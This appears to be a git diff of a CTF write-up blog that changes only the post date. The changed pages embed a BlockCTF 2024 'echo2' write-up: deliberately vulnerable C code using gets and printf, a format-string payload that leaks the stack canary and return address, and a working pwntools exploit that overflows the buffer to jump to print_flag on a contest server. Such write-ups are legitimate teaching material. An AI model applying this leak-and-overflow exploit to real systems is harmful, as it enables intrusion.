diff --git a/content/posts/block-ctf-2024-echo2.md b/content/posts/block-ctf-2024-echo2.md index 6b38810..06798f9 100644 --- a/content/posts/block-ctf-2024-echo2.md +++ b/content/posts/block-ctf-2024-echo2.md @@ -1,6 +1,6 @@ +++ title = 'BlockCTF 2024 - pwn/echo2' -date = 2024-11-17T22:52:37-05:00 +date = 2024-11-11T20:52:37-05:00 draft = false +++ diff --git a/public/index.html b/public/index.html index 5eeab5d..70e5594 100644 --- a/public/index.html +++ b/public/index.html @@ -167,7 +167,7 @@

BlockCTF 2024 - pwn/echo2

We are given a binary with all protectoins turned on and c source code. #include <fcntl.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open("flag.txt", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....

- + diff --git a/public/index.xml b/public/index.xml index 514f1c8..962f697 100644 --- a/public/index.xml +++ b/public/index.xml @@ -6,12 +6,12 @@ Recent content on CTF Writeups Hugo -- gohugo.io en-us - Sun, 17 Nov 2024 22:52:37 -0500 + Mon, 11 Nov 2024 20:52:37 -0500 BlockCTF 2024 - pwn/echo2 https://dfoudeh.github.io/posts/block-ctf-2024-echo2/ - Sun, 17 Nov 2024 22:52:37 -0500 + Mon, 11 Nov 2024 20:52:37 -0500 https://dfoudeh.github.io/posts/block-ctf-2024-echo2/ We are given a binary with all protectoins turned on and c source code. #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo(). diff --git a/public/posts/block-ctf-2024-echo2/index.html b/public/posts/block-ctf-2024-echo2/index.html index f6e24fd..cec9f8d 100644 --- a/public/posts/block-ctf-2024-echo2/index.html +++ b/public/posts/block-ctf-2024-echo2/index.html @@ -61,8 +61,8 @@ #include <fcntl.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open("flag.txt", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()." /> - - + + @@ -103,8 +103,8 @@ "articleBody": "We are given a binary with all protectoins turned on and c source code.\n#include #include #include #include #include void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(\"flag.txt\", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo(). We can set a breakpoint in do_echo() after printf and enter a format string to leak the canary and an address.\nSending our format string\n%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx We leak out the stack\n5555555592a1.0.7ffff7f8b8e055555555934b.0.2e786c252e786c25.252e786c25786c25.252e786c252e786c6c25786c252e786c.6c252e786c252e78.6c252e786c252e78.786c252e786c2578.786c252e786c252e2e786c25786c252e.2e786c252e786c25.25786c252e786c25.252e786c252e786c.252e786c252e786c6c252e786c25786c.6c252e786c252e78.786c25786c252e78.786c252e786c252e.786c252e786c252e2e786c252e786c25.2e786c252e786c25.252e786c25786c25.786c.00.0.0.0.00.0.0.0.07befa8536e8aba00.7fffffffe338.5555555555b5.5555555555a1.7ffff7dc9e087fffffffe260.7fffffffe338 07befa8536e8aba00 at offset 39 looks like our canary and at offset 41 is the saved RIP. In gdb with the gef extenstoin, we can use the command ‘canary’ to print out the canary and confirm that we have the right one. Similarly we can use ‘info frame’ to see that we have the right RIP.\nThe saved RIP address is main+20. We can calculate the offset between this andress and the start of the print_flag fucntion, which is 908. Putting it all together:\nfrom pwn import * target = remote(\"54.85.45.101\", 8009) # leak canary payload = \"%39$lx\" target.sendline(payload) canary = int(target.recv(16),16) log.info(hex(canary)) # leak RIP payload = \"%41$lx\" target.sendline(payload) rip = int(target.recv(12),16) log.info(hex(rip)) # offset from leak to print_flag = 908 payload = b\"A\" * 264 + p64(canary) + p64(0xdeadbeef) + p64(rip - 908) target.sendline(payload) target.interactive() flag{aslr_and_canari3s_are_n0_match_f0r_l3aky_stacks}\n", "wordCount" : "242", "inLanguage": "en", - "datePublished": "2024-11-17T22:52:37-05:00", - "dateModified": "2024-11-17T22:52:37-05:00", + "datePublished": "2024-11-11T20:52:37-05:00", + "dateModified": "2024-11-11T20:52:37-05:00", "mainEntityOfPage": { "@type": "WebPage", "@id": "https://dfoudeh.github.io/posts/block-ctf-2024-echo2/" @@ -174,7 +174,7 @@

BlockCTF 2024 - pwn/echo2

-
November 17, 2024 +
November 11, 2024
diff --git a/public/posts/index.html b/public/posts/index.html index 71e7828..482475f 100644 --- a/public/posts/index.html +++ b/public/posts/index.html @@ -143,7 +143,7 @@

BlockCTF 2024 - pwn/echo2

We are given a binary with all protectoins turned on and c source code. #include <fcntl.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open("flag.txt", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....

-
November 17, 2024
+
November 11, 2024
diff --git a/public/posts/index.xml b/public/posts/index.xml index e699651..5ed1ccb 100644 --- a/public/posts/index.xml +++ b/public/posts/index.xml @@ -6,12 +6,12 @@ Recent content in Posts on CTF Writeups Hugo -- gohugo.io en-us - Sun, 17 Nov 2024 22:52:37 -0500 + Mon, 11 Nov 2024 20:52:37 -0500 BlockCTF 2024 - pwn/echo2 https://dfoudeh.github.io/posts/block-ctf-2024-echo2/ - Sun, 17 Nov 2024 22:52:37 -0500 + Mon, 11 Nov 2024 20:52:37 -0500 https://dfoudeh.github.io/posts/block-ctf-2024-echo2/ We are given a binary with all protectoins turned on and c source code. #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo(). diff --git a/public/sitemap.xml b/public/sitemap.xml index b105254..8310a81 100644 --- a/public/sitemap.xml +++ b/public/sitemap.xml @@ -3,13 +3,13 @@ xmlns:xhtml="http://www.w3.org/1999/xhtml"> https://dfoudeh.github.io/posts/block-ctf-2024-echo2/ - 2024-11-17T22:52:37-05:00 + 2024-11-11T20:52:37-05:00 https://dfoudeh.github.io/ - 2024-11-17T22:52:37-05:00 + 2024-11-11T20:52:37-05:00 https://dfoudeh.github.io/posts/ - 2024-11-17T22:52:37-05:00 + 2024-11-11T20:52:37-05:00 https://dfoudeh.github.io/posts/du-ctf-2024-yawa/ 2024-07-07T10:47:36-04:00